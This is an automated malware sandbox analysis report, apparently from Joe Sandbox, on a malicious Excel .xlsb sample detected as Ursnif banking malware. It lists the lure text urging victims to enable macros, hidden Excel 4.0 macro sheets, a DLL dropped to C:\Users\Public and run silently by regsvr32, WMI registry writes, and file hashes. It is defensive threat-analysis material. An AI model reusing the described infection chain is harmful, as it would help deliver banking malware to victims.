                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.local
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://management.azure.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://management.azure.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://messaging.office.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ncus.contentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ncus.pagecontentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officeapps.live.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://settings.outlook.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://staging.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://tasks.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.contentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.pagecontentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.odwebp.svc.ms

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                E-Banking Fraud:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 [i] Once You have Enable Editing, please cli
                Source: Screenshot number: 4Screenshot OCR: Enable Content 13 from the yellow bar above 14 15 / , :: WHY I CANNOT OPEN THIS DOCUMENT? ' 1
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: 6613n246zm543w.xlsbInitial sample: EXEC
                Source: 6613n246zm543w.xlsbInitial sample: CALL
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 25180
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 45240
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 38015
                Office process drops PE fileShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Writes or reads registry keys via WMIShow sources
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Writes registry values via WMIShow sources
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB18D1 GetProcAddress,NtCreateSection,memset,1_2_66DB18D1
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1B89 NtMapViewOfSection,1_2_66DB1B89
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2485 NtQueryVirtualMemory,1_2_66DB2485
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB22641_2_66DB2264
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DF348A1_2_66DF348A
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DE7AD71_2_66DE7AD7
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\block.dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@12/59@4/2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{2CCBB9CE-342A-4F78-A4D3-93ED91BA9B6E} - OProcSessId.datJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dllJump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image1.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image2.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image3.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image4.png
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress,1_2_66DB1F31
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2253 push ecx; ret 1_2_66DB2263
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2200 push ecx; ret 1_2_66DB2209
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DBFE6C push ebx; retf 1_2_66DBFE6D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC677F push esi; iretd 1_2_66DC678A
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DE4475 push ecx; ret 1_2_66DE4488
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC446A push esi; ret 1_2_66DC446B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC2403 push ebp; retf 1_2_66DC244E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC243F push ebp; retf 1_2_66DC244E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC5B7B push eax; ret 1_2_66DC5B7C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC633B push edx; retf 1_2_66DC6345
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFD33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_66DFD348
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFE175 push ds; iretd 1_2_66DFE179
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY
                Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
